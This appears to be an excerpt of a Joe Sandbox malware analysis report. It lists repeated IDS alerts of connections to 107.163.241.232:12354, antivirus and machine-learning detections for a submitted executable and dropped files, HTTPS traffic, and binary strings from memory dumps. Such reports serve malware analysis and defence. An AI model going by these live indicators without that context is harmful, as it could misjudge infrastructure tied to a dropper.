2024-12-11T16:28:21.643002+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50643	107.163.241.232	12354	TCP
2024-12-11T16:28:21.771821+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50648	107.163.241.232	12354	TCP
2024-12-11T16:28:23.432362+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50713	107.163.241.232	12354	TCP
2024-12-11T16:28:23.432404+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50717	107.163.241.232	12354	TCP
2024-12-11T16:28:25.660714+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50762	107.163.241.232	12354	TCP
2024-12-11T16:28:25.877408+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50770	107.163.241.232	12354	TCP
2024-12-11T16:28:27.553374+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50845	107.163.241.232	12354	TCP
2024-12-11T16:28:31.553753+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51048	107.163.241.232	12354	TCP
2024-12-11T16:28:31.553906+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51029	107.163.241.232	12354	TCP
2024-12-11T16:28:33.862365+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51071	107.163.241.232	12354	TCP
2024-12-11T16:28:33.972986+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51084	107.163.241.232	12354	TCP
2024-12-11T16:28:35.678642+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51177	107.163.241.232	12354	TCP
2024-12-11T16:28:38.019436+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51229	107.163.241.232	12354	TCP
2024-12-11T16:28:38.457047+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51258	107.163.241.232	12354	TCP
2024-12-11T16:28:40.740405+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51304	107.163.241.232	12354	TCP
2024-12-11T16:28:41.769700+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51369	107.163.241.232	12354	TCP
2024-12-11T16:28:42.522296+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51461	107.163.241.232	12354	TCP
2024-12-11T16:28:45.127480+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51572	107.163.241.232	12354	TCP
2024-12-11T16:28:45.678419+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51588	107.163.241.232	12354	TCP
2024-12-11T16:28:46.647164+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51748	107.163.241.232	12354	TCP
2024-12-11T16:28:46.647213+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51741	107.163.241.232	12354	TCP
2024-12-11T16:28:49.128947+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51797	107.163.241.232	12354	TCP
2024-12-11T16:28:49.305040+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51807	107.163.241.232	12354	TCP
2024-12-11T16:28:50.772592+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51919	107.163.241.232	12354	TCP
2024-12-11T16:28:50.772633+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51946	107.163.241.232	12354	TCP
2024-12-11T16:28:53.364545+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52997	107.163.241.232	12354	TCP
2024-12-11T16:28:54.793223+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55606	107.163.241.232	12354	TCP
2024-12-11T16:28:54.793326+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54683	107.163.241.232	12354	TCP
2024-12-11T16:28:59.191951+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56587	107.163.241.232	12354	TCP
2024-12-11T16:28:59.553969+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57316	107.163.241.232	12354	TCP
2024-12-11T16:29:00.538494+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58940	107.163.241.232	12354	TCP
2024-12-11T16:29:00.538502+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	59328	107.163.241.232	12354	TCP
2024-12-11T16:29:04.049438+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61306	107.163.241.232	12354	TCP
2024-12-11T16:29:04.660251+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61799	107.163.241.232	12354	TCP
2024-12-11T16:29:04.673284+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63221	107.163.241.232	12354	TCP
2024-12-11T16:29:06.912088+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63465	107.163.241.232	12354	TCP
2024-12-11T16:29:07.786094+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	64121	107.163.241.232	12354	TCP
2024-12-11T16:29:08.819311+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49614	107.163.241.232	12354	TCP
2024-12-11T16:29:08.819495+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	65244	107.163.241.232	12354	TCP
2024-12-11T16:29:11.239027+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50853	107.163.241.232	12354	TCP
2024-12-11T16:29:11.942307+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51370	107.163.241.232	12354	TCP
2024-12-11T16:29:12.828788+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53048	107.163.241.232	12354	TCP
2024-12-11T16:29:12.829086+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53658	107.163.241.232	12354	TCP
2024-12-11T16:29:15.441867+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55059	107.163.241.232	12354	TCP
2024-12-11T16:29:15.598441+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55060	107.163.241.232	12354	TCP
2024-12-11T16:29:16.835308+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56681	107.163.241.232	12354	TCP
2024-12-11T16:29:16.835311+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57493	107.163.241.232	12354	TCP
2024-12-11T16:29:19.834432+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58358	107.163.241.232	12354	TCP
2024-12-11T16:29:19.944181+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58512	107.163.241.232	12354	TCP
2024-12-11T16:29:20.850742+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60820	107.163.241.232	12354	TCP
2024-12-11T16:29:20.850802+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60772	107.163.241.232	12354	TCP
2024-12-11T16:29:23.114747+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61199	107.163.241.232	12354	TCP
2024-12-11T16:29:23.223453+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61316	107.163.241.232	12354	TCP
2024-12-11T16:29:25.203995+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63569	107.163.241.232	12354	TCP
2024-12-11T16:29:25.204001+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63454	107.163.241.232	12354	TCP
2024-12-11T16:29:27.723682+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63737	107.163.241.232	12354	TCP
2024-12-11T16:29:29.178557+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	64597	107.163.241.232	12354	TCP
2024-12-11T16:29:29.663645+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	65289	107.163.241.232	12354	TCP
2024-12-11T16:29:29.663668+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	65257	107.163.241.232	12354	TCP
2024-12-11T16:29:31.911465+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49154	107.163.241.232	12354	TCP
2024-12-11T16:29:32.020233+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49190	107.163.241.232	12354	TCP
2024-12-11T16:29:35.193029+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50868	107.163.241.232	12354	TCP
2024-12-11T16:29:35.241204+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50870	107.163.241.232	12354	TCP
2024-12-11T16:29:37.014773+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52752	107.163.241.232	12354	TCP
2024-12-11T16:29:37.014903+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52788	107.163.241.232	12354	TCP
2024-12-11T16:29:39.255480+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52806	107.163.241.232	12354	TCP
2024-12-11T16:29:39.384470+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52835	107.163.241.232	12354	TCP
2024-12-11T16:29:41.022443+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54070	107.163.241.232	12354	TCP
2024-12-11T16:29:41.022467+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54029	107.163.241.232	12354	TCP
2024-12-11T16:29:43.308211+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54209	107.163.241.232	12354	TCP
2024-12-11T16:29:43.382481+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54325	107.163.241.232	12354	TCP
2024-12-11T16:29:45.990235+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56038	107.163.241.232	12354	TCP
2024-12-11T16:29:47.068013+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56199	107.163.241.232	12354	TCP
2024-12-11T16:29:48.070598+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57816	107.163.241.232	12354	TCP
2024-12-11T16:29:48.070722+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57129	107.163.241.232	12354	TCP
2024-12-11T16:29:50.317419+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58639	107.163.241.232	12354	TCP
2024-12-11T16:29:50.661349+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58741	107.163.241.232	12354	TCP
2024-12-11T16:29:52.199824+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60671	107.163.241.232	12354	TCP
2024-12-11T16:29:52.199875+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60441	107.163.241.232	12354	TCP
2024-12-11T16:29:54.427827+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61903	107.163.241.232	12354	TCP
2024-12-11T16:29:54.568304+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61986	107.163.241.232	12354	TCP
2024-12-11T16:29:56.335117+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63920	107.163.241.232	12354	TCP
2024-12-11T16:29:56.335142+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63794	107.163.241.232	12354	TCP
2024-12-11T16:29:58.567360+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	65326	107.163.241.232	12354	TCP
2024-12-11T16:29:58.677205+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	65458	107.163.241.232	12354	TCP
2024-12-11T16:30:00.351175+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50847	107.163.241.232	12354	TCP
2024-12-11T16:30:00.351358+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50825	107.163.241.232	12354	TCP
2024-12-11T16:30:02.605565+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52005	107.163.241.232	12354	TCP
2024-12-11T16:30:02.756051+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52150	107.163.241.232	12354	TCP
2024-12-11T16:30:04.355668+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53912	107.163.241.232	12354	TCP
2024-12-11T16:30:04.355985+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54033	107.163.241.232	12354	TCP
2024-12-11T16:30:06.582272+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55293	107.163.241.232	12354	TCP
2024-12-11T16:30:06.833678+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	55419	107.163.241.232	12354	TCP
2024-12-11T16:30:08.366388+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57352	107.163.241.232	12354	TCP
2024-12-11T16:30:08.366422+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57129	107.163.241.232	12354	TCP
2024-12-11T16:30:10.680304+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58562	107.163.241.232	12354	TCP
2024-12-11T16:30:10.788310+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58708	107.163.241.232	12354	TCP
2024-12-11T16:30:12.370391+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60121	107.163.241.232	12354	TCP
2024-12-11T16:30:12.370442+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	60021	107.163.241.232	12354	TCP
2024-12-11T16:30:14.599528+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61491	107.163.241.232	12354	TCP
2024-12-11T16:30:14.742552+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61570	107.163.241.232	12354	TCP
2024-12-11T16:30:16.496188+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63612	107.163.241.232	12354	TCP
2024-12-11T16:30:16.496227+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63505	107.163.241.232	12354	TCP
2024-12-11T16:30:18.739972+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	65323	107.163.241.232	12354	TCP
2024-12-11T16:30:18.865408+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	65389	107.163.241.232	12354	TCP
2024-12-11T16:30:20.508297+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50975	107.163.241.232	12354	TCP
2024-12-11T16:30:20.508329+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	50829	107.163.241.232	12354	TCP
2024-12-11T16:30:22.746542+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52158	107.163.241.232	12354	TCP
2024-12-11T16:30:22.884825+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	52198	107.163.241.232	12354	TCP
2024-12-11T16:30:24.761095+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53724	107.163.241.232	12354	TCP
2024-12-11T16:30:24.761216+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53837	107.163.241.232	12354	TCP
2024-12-11T16:30:27.035376+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54347	107.163.241.232	12354	TCP
2024-12-11T16:30:27.224335+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54354	107.163.241.232	12354	TCP
2024-12-11T16:30:28.816773+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56201	107.163.241.232	12354	TCP
2024-12-11T16:30:28.816908+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56039	107.163.241.232	12354	TCP
2024-12-11T16:30:31.115604+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56252	107.163.241.232	12354	TCP
2024-12-11T16:30:31.287859+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56254	107.163.241.232	12354	TCP
2024-12-11T16:30:33.039389+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58090	107.163.241.232	12354	TCP
2024-12-11T16:30:33.039416+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58073	107.163.241.232	12354	TCP
2024-12-11T16:30:35.287287+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58146	107.163.241.232	12354	TCP
2024-12-11T16:30:35.459632+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58153	107.163.241.232	12354	TCP
2024-12-11T16:30:37.179448+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	59396	107.163.241.232	12354	TCP
2024-12-11T16:30:37.179512+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	59400	107.163.241.232	12354	TCP
2024-12-11T16:30:39.430246+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	59732	107.163.241.232	12354	TCP
2024-12-11T16:30:39.521702+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	59839	107.163.241.232	12354	TCP
2024-12-11T16:30:42.022482+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61066	107.163.241.232	12354	TCP
2024-12-11T16:30:42.423645+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	61081	107.163.241.232	12354	TCP
2024-12-11T16:30:43.944861+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	62888	107.163.241.232	12354	TCP
2024-12-11T16:30:43.944873+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	62665	107.163.241.232	12354	TCP
2024-12-11T16:30:46.178271+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63787	107.163.241.232	12354	TCP
2024-12-11T16:30:46.287300+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	63901	107.163.241.232	12354	TCP
2024-12-11T16:30:47.959947+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49512	107.163.241.232	12354	TCP
2024-12-11T16:30:47.959978+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49405	107.163.241.232	12354	TCP
2024-12-11T16:30:50.318159+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51248	107.163.241.232	12354	TCP
2024-12-11T16:30:50.318383+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	51247	107.163.241.232	12354	TCP
2024-12-11T16:30:52.084901+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53356	107.163.241.232	12354	TCP
2024-12-11T16:30:52.084953+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	53222	107.163.241.232	12354	TCP
2024-12-11T16:30:54.321134+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54771	107.163.241.232	12354	TCP
2024-12-11T16:30:54.430169+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	54925	107.163.241.232	12354	TCP
2024-12-11T16:30:56.168398+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56879	107.163.241.232	12354	TCP
2024-12-11T16:30:56.168425+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	56860	107.163.241.232	12354	TCP
2024-12-11T16:30:58.491193+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57630	107.163.241.232	12354	TCP
2024-12-11T16:30:58.803244+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	57670	107.163.241.232	12354	TCP
2024-12-11T16:31:00.729701+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58364	107.163.241.232	12354	TCP
2024-12-11T16:31:01.036663+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	58692	107.163.241.232	12354	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: peks66Iy06.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\nfxboms.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\ijbbn\gduol.dll

ReversingLabs: Detection: 92%

Multi AV Scanner detection for submitted file

Source: peks66Iy06.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for dropped file

Source: C:\ijbbn\gduol.dll	Joe Sandbox ML: detected
Source: C:\nfxboms.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: peks66Iy06.exe

Joe Sandbox ML: detected

Source: peks66Iy06.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown

HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56556 version: TLS 1.0

Source: C:\Windows\SysWOW64\rundll32.exe

File created: c:\ijbbn\ReadMe.txt

Jump to behavior

Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:49958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:51645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:54642 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:65033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:52867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:59261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:63764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:52804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:60232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:63386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50640 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:53648 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:63100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:50503 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:53382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:55599 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:59372 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:65482 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:52679 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:56742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.7:58163 version: TLS 1.2

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 0000000B.00000003.2468998443.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2783300869.0000000005F01000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2243415047.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: INETCA~1.DATntkrnlmp.pdbx6 source: rundll32.exe, 0000000B.00000003.2243415047.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\. source: rundll32.exe, 0000000B.00000003.2498213283.00000000030CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: rundll32.exe, 0000000B.00000003.2468998443.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.1931256177.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931233952.0000000003133000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930989630.000000000312E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\. source: rundll32.exe, 0000000B.00000003.1705184799.000000000313E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\. source: rundll32.exe, 0000000B.00000003.2243458067.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\. source: rundll32.exe, 0000000B.00000003.1972863803.0000000003142000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2678890956.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\..ore\. source: rundll32.exe, 0000000B.00000003.2243458067.000000000312E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\.\.\.ta\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.2266699679.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2267145364.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.}\.y\. source: rundll32.exe, 0000000B.00000003.2461258215.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\.. source: rundll32.exe, 0000000B.00000003.2243458067.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\. source: rundll32.exe, 0000000B.00000003.1996678440.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.00000000030CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\.*?s source: rundll32.exe, 0000000B.00000003.2243458067.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tion Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.*Qv source: rundll32.exe, 0000000B.00000003.1524069931.0000000003142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.* source: rundll32.exe, 0000000B.00000003.2461344495.0000000005E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: LOG.oldLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 0000000B.00000003.3423348893.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.3# source: rundll32.exe, 0000000B.00000003.1705006131.00000000030CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\..* source: rundll32.exe, 0000000B.00000003.2678890956.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.* source: rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.2120279676.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.41 source: rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\..\.* source: rundll32.exe, 0000000B.00000003.2839087672.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ANALYT~1.JSCntkrnlmp.pdbfx6 source: rundll32.exe, 0000000B.00000003.2783300869.0000000005F01000.00000004.00000020.00020000.00000000.sdmp
